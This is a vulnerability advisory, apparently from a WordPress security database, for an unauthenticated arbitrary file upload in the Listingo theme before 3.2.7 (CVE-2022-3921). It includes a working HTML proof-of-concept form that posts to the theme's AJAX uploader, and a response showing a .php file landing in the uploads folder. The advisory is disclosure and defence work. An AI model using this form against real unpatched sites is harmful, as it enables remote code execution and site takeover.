Themes Vulnerabilities

Listingo < 3.2.7 - Unauthenticated Arbitrary File Upload

Description

The theme does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Listingo Unauthenticated File Upload</title>
</head>
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="listingo_uploader" id="listingo_uploader">
        <input type="submit" name="submit" value="Start Upload">
    </form>
</body>
</html>

The response give the path to the file uploaded:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}

Affects Themes

listingo
Fixed in 3.2.7

References

CVE
CVE-2022-3921

Miscellaneous

Original Researcher
Fioravante Souza
Submitter
Fioravante Souza
Submitter website
https://jetpack.com
Submitter twitter
fiocavallari
Verified
Yes
WPVDB ID
e39b59b0-f24f-4de5-a21c-c4de34c3a14f

Timeline

Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
Ajax Multi Upload 1.1 - Shell Upload
Published
2014-08-01
Title
Amerisale-Re - Remote Shell Upload
Published
2022-07-21
Title
GREYD.SUITE < 1.2.7 - Unauthenticated File Upload to RCE
Published
2014-08-01
Title
Agritourismo - Remote File Upload
Published
2023-11-14
Title
Forminator < 1.28.0 - Admin+ Arbitrary File Upload